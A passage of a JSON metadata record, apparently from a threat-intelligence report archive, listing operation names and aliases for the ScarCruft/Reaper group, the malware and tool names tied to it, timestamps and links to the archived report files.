Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775701362, "ts_updated_at": 1775792286, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7e612877e5c674dba43770826efbaad4e12f46f3.pdf", "text": "https://archive.orkl.eu/7e612877e5c674dba43770826efbaad4e12f46f3.txt", "img": "https://archive.orkl.eu/7e612877e5c674dba43770826efbaad4e12f46f3.jpg" } }